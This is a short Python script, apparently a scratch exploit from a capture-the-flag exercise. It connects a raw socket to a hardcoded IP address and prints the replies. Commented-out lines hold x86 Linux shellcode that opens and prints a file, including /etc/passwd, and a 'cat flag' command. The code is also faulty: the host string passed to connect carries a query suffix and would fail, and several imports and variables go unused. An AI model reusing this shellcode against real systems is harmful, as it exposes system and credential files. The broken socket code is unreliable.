import requests



import sys
import socket
import string
from subprocess import call

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
args = 'a' * 1024
s.connect(("52.68.245.164?args=12", 80))
 
while True:

	data = s.recv(4096)
	if not data:
		break

	data_string = data.decode("utf-8")

	print(data_string)


	# code = 'cat flag\n'
	# code = '\x07\n'
	# print code

	# '\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x32\x5b\xb0\x05\x31\xc9\xcd\x80\x89\xc6\xeb\x06\xb0\x01\x31\xdb\xcd\x80\x89\xf3\xb0\x03\x83\xec\x01\x8d\x0c\x24\xb2\x01\xcd\x80\x31\xdb\x39\xc3\x74\xe6\xb0\x04\xb3\x01\xb2\x01\xcd\x80\x83\xc4\x01\xeb\xdf\xe8\xc9\xff\xff\xff/home/nkfly/test'
	
	# 0xffffd4f0


	# print(code)

	# s.send(code)

# 	char main[]=
# "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x32\x5b\xb0\x05\x31\xc9\xcd\x80\x89\xc6\xeb\x06\xb0\x01\x31\xdb\xcd\x80\x89\xf3\xb0\x03\x83\xec\x01\x8d\x0c\x24\xb2\x01\xcd\x80\x31\xdb\x39\xc3\x74\xe6\xb0\x04\xb3\x01\xb2\x01\xcd\x80\x83\xc4\x01\xeb\xdf\xe8\xc9\xff\xff\xff/etc/passwd";



s.close()


	
		
		





